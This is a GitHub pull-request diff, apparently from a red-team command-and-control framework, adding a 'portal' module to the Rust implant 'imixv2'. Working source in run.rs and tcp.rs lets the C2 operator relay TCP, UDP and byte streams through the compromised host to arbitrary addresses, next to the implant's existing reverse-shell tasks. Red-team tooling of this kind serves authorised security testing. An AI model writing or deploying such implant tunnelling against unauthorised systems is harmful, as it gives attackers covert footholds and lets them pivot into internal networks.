Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions implants/Cargo.toml
Original file line number Diff line number Diff line change
Expand Up @@ -56,6 +56,7 @@ eldritch-libregex = {path = "lib/eldritchv2/stdlib/eldritch-libregex",default-fe
eldritch-libreport = {path = "lib/eldritchv2/stdlib/eldritch-libreport",default-features = false }
eldritch-libsys = {path = "lib/eldritchv2/stdlib/eldritch-libsys",default-features = false }
eldritch-libtime = {path = "lib/eldritchv2/stdlib/eldritch-libtime",default-features = false }
portal-stream = { path = "lib/portals/portal-stream" }

aes = "0.8.3"
allocative = "0.3.2"
Expand Down
3 changes: 3 additions & 0 deletions implants/imixv2/Cargo.toml
Original file line number Diff line number Diff line change
Expand Up @@ -20,7 +20,10 @@ tokio = { workspace = true, features = [
"macros",
"sync",
"time",
"net",
"io-util",
] }
portal-stream = { workspace = true }
anyhow = { workspace = true }
log = { workspace = true }
futures = { workspace = true }
Expand Down
7 changes: 7 additions & 0 deletions implants/imixv2/src/agent.rs
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@ use transport::Transport;

use crate::shell::{run_repl_reverse_shell, run_reverse_shell_pty};
use crate::task::TaskRegistry;
use crate::portal::run_create_portal;

#[derive(Clone)]
pub struct ImixAgent<T: Transport> {
Expand Down Expand Up @@ -269,6 +270,12 @@ impl<T: Transport + Send + Sync + 'static> Agent for ImixAgent<T> {
})
}

fn create_portal(&self, task_id: i64) -> Result<(), String> {
self.spawn_subtask(task_id, move |transport| async move {
run_create_portal(task_id, transport).await
})
}

fn start_repl_reverse_shell(&self, task_id: i64) -> Result<(), String> {
let agent = self.clone();
self.spawn_subtask(task_id, move |transport| async move {
Expand Down
1 change: 1 addition & 0 deletions implants/imixv2/src/lib.rs
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@ extern crate alloc;

pub mod agent;
pub mod assets;
pub mod portal;
pub mod run;
pub mod shell;
pub mod task;
Expand Down
1 change: 1 addition & 0 deletions implants/imixv2/src/main.rs
Original file line number Diff line number Diff line change
Expand Up @@ -19,6 +19,7 @@ pub use transport::{ActiveTransport, Transport};
mod agent;
mod assets;
mod install;
mod portal;
mod run;
mod shell;
mod task;
Expand Down
45 changes: 45 additions & 0 deletions implants/imixv2/src/portal/bytes.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,45 @@
use anyhow::{Result};
use pb::portal::{mote::Payload, Mote, BytesPayloadKind};
use portal_stream::PayloadSequencer;
use tokio::sync::mpsc;

pub async fn handle_bytes(
first_mote: Mote,
mut rx: mpsc::Receiver<Mote>,
out_tx: mpsc::Sender<Mote>,
sequencer: PayloadSequencer,
) -> Result<()> {

// Process first mote
process_byte_mote(first_mote, &out_tx, &sequencer).await?;

// Loop
while let Some(mote) = rx.recv().await {
process_byte_mote(mote, &out_tx, &sequencer).await?;
}

Ok(())
}

async fn process_byte_mote(
mote: Mote,
out_tx: &mpsc::Sender<Mote>,
sequencer: &PayloadSequencer,
) -> Result<()> {
if let Some(Payload::Bytes(b)) = mote.payload {
match BytesPayloadKind::try_from(b.kind).ok() {
Some(BytesPayloadKind::Ping) => {
// Echo back with same data
let resp = sequencer.new_bytes_mote(b.data, BytesPayloadKind::Ping);
out_tx.send(resp).await.map_err(|e| anyhow::anyhow!("Send failed: {}", e))?;
}
Some(BytesPayloadKind::Keepalive) => {
// Ignore
}
_ => {
// Ignore Data/Unspecified for now as per requirements
}
}
}
Ok(())
}
14 changes: 14 additions & 0 deletions implants/imixv2/src/portal/mod.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
use anyhow::Result;
use transport::Transport;

pub mod bytes;
pub mod run;
pub mod tcp;
pub mod udp;

pub async fn run_create_portal<T: Transport + Send + Sync + 'static>(
task_id: i64,
transport: T,
) -> Result<()> {
run::run(task_id, transport).await
}
197 changes: 197 additions & 0 deletions implants/imixv2/src/portal/run.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,197 @@
use anyhow::Result;
use pb::c2::{CreatePortalRequest, CreatePortalResponse};
use pb::portal::{mote::Payload, Mote};
use portal_stream::{OrderedReader, PayloadSequencer};
use std::collections::HashMap;
use tokio::sync::mpsc;
use transport::Transport;

use super::{bytes, tcp, udp};

/// Context for a single stream ID
struct StreamContext {
reader: OrderedReader,
tx: mpsc::Sender<Mote>,
}

pub async fn run<T: Transport + Send + Sync + 'static>(
task_id: i64,
mut transport: T,
) -> Result<()> {
let (req_tx, req_rx) = mpsc::channel::<CreatePortalRequest>(100);
let (resp_tx, mut resp_rx) = mpsc::channel::<CreatePortalResponse>(100);

// Start transport loop
// Note: We use a separate task for transport since it might block or be long-running
let transport_handle = tokio::spawn(async move {
if let Err(e) = transport.create_portal(req_rx, resp_tx).await {
#[cfg(debug_assertions)]
log::error!("Portal transport error: {}", e);
}
});

// Map of stream_id -> StreamContext
// Each stream has its own OrderedReader and a sender to its handler task
let mut streams: HashMap<String, StreamContext> = HashMap::new();

// Map to track running tasks
let mut tasks = Vec::new();

// Channel for handler tasks to send outgoing motes back to main loop
let (out_tx, mut out_rx) = mpsc::channel::<Mote>(100);

// Send initial registration message
if req_tx
.send(CreatePortalRequest {
task_id,
mote: None,
})
.await
.is_err()
{
return Err(anyhow::anyhow!("Failed to send initial portal registration"));
}

loop {
tokio::select! {
// Incoming message from C2 (via transport)
msg = resp_rx.recv() => {
match msg {
Some(resp) => {
if let Some(mote) = resp.mote {
if let Err(e) = handle_incoming_mote(mote, &mut streams, &out_tx, &mut tasks).await {
#[cfg(debug_assertions)]
log::error!("Error handling incoming mote: {}", e);
}
}
}
None => {
// Transport closed
break;
}
}
}

// Outgoing message from handler tasks
msg = out_rx.recv() => {
match msg {
Some(mote) => {
let req = CreatePortalRequest {
task_id,
mote: Some(mote),
};
if req_tx.send(req).await.is_err() {
break;
}
}
None => {
break; // All handlers closed? Unlikely.
}
}
}
}
}

// Cleanup
transport_handle.abort();
for task in tasks {
task.abort();
}

Ok(())
}

async fn handle_incoming_mote(
mote: Mote,
streams: &mut HashMap<String, StreamContext>,
out_tx: &mpsc::Sender<Mote>,
tasks: &mut Vec<tokio::task::JoinHandle<()>>,
) -> Result<()> {
let stream_id = mote.stream_id.clone();

// Get or create context
if !streams.contains_key(&stream_id) {
// Create new stream context
let (tx, rx) = mpsc::channel::<Mote>(100);
let reader = OrderedReader::new();

streams.insert(
stream_id.clone(),
StreamContext { reader, tx },
);

// Spawn handler task based on payload type?
// Actually, we don't know the type until we inspect the payload.
// But the OrderedReader just orders packets.
// The handler logic needs to receive ordered packets.
// So we spawn a generic handler that processes the first packet to decide implementation.

let out_tx_clone = out_tx.clone();
let stream_id_clone = stream_id.clone();

let task = tokio::spawn(async move {
if let Err(e) = stream_handler(stream_id_clone, rx, out_tx_clone).await {
#[cfg(debug_assertions)]
log::error!("Stream handler error: {}", e);
}
});
tasks.push(task);
}

let ctx = streams.get_mut(&stream_id).unwrap();

// Process through OrderedReader
// Note: OrderedReader.process is synchronous, so we can call it here.
match ctx.reader.process(mote) {
Ok(Some(ordered_motes)) => {
for m in ordered_motes {
if ctx.tx.send(m).await.is_err() {
// Handler closed, maybe remove stream?
// For now, we just ignore/log
#[cfg(debug_assertions)]
log::warn!("Stream handler closed for {}", stream_id);
}
}
}
Ok(None) => {
// Buffered or duplicate
}
Err(e) => {
// Buffer overflow or timeout
return Err(e);
}
}

Ok(())
}

async fn stream_handler(
stream_id: String,
mut rx: mpsc::Receiver<Mote>,
out_tx: mpsc::Sender<Mote>,
) -> Result<()> {
// Wait for first message to determine type
let first_mote = match rx.recv().await {
Some(m) => m,
None => return Ok(()),
};

let sequencer = PayloadSequencer::new(stream_id.clone());

// Determine handler based on payload
if let Some(payload) = &first_mote.payload {
match payload {
Payload::Tcp(_) => {
tcp::handle_tcp(first_mote, rx, out_tx, sequencer).await
}
Payload::Udp(_) => {
udp::handle_udp(first_mote, rx, out_tx, sequencer).await
}
Payload::Bytes(_) => {
bytes::handle_bytes(first_mote, rx, out_tx, sequencer).await
}
}
} else {
Ok(())
}
}
71 changes: 71 additions & 0 deletions implants/imixv2/src/portal/tcp.rs
Original file line number Diff line number Diff line change
@@ -0,0 +1,71 @@
use anyhow::{Result, Context};
use pb::portal::{mote::Payload, Mote};
use portal_stream::PayloadSequencer;
use tokio::io::{AsyncReadExt, AsyncWriteExt};
use tokio::net::TcpStream;
use tokio::sync::mpsc;

pub async fn handle_tcp(
first_mote: Mote,
mut rx: mpsc::Receiver<Mote>,
out_tx: mpsc::Sender<Mote>,
sequencer: PayloadSequencer,
) -> Result<()> {
// Extract destination from first mote
let (dst_addr, dst_port, initial_data) = if let Some(Payload::Tcp(tcp)) = first_mote.payload {
(tcp.dst_addr, tcp.dst_port, tcp.data)
} else {
return Err(anyhow::anyhow!("Expected TCP payload"));
};

let addr = format!("{}:{}", dst_addr, dst_port);

#[cfg(debug_assertions)]
log::debug!("Connecting TCP to {}", addr);

let stream = TcpStream::connect(&addr).await.context("Failed to connect TCP")?;
let (mut read_half, mut write_half) = tokio::io::split(stream);

// If initial data exists, write it
if !initial_data.is_empty() {
write_half.write_all(&initial_data).await?;
}

// Spawn reader task (Socket -> C2)
// We pass `sequencer` to the read task as it generates outgoing motes.
let out_tx_clone = out_tx.clone();
let dst_addr_clone = dst_addr.clone();

let read_task = tokio::spawn(async move {
let mut buf = [0u8; 4096];
loop {
match read_half.read(&mut buf).await {
Ok(0) => break, // EOF
Ok(n) => {
let data = buf[0..n].to_vec();
let mote = sequencer.new_tcp_mote(data, dst_addr_clone.clone(), dst_port);
if out_tx_clone.send(mote).await.is_err() {
break;
}
}
Err(_) => break,
}
}
});

// Write Loop (C2 -> Socket)
while let Some(mote) = rx.recv().await {
if let Some(Payload::Tcp(tcp)) = mote.payload {
if !tcp.data.is_empty() {
if write_half.write_all(&tcp.data).await.is_err() {
break;
}
}
}
}

// Cleanup
let _ = read_task.await;

Ok(())
}
Loading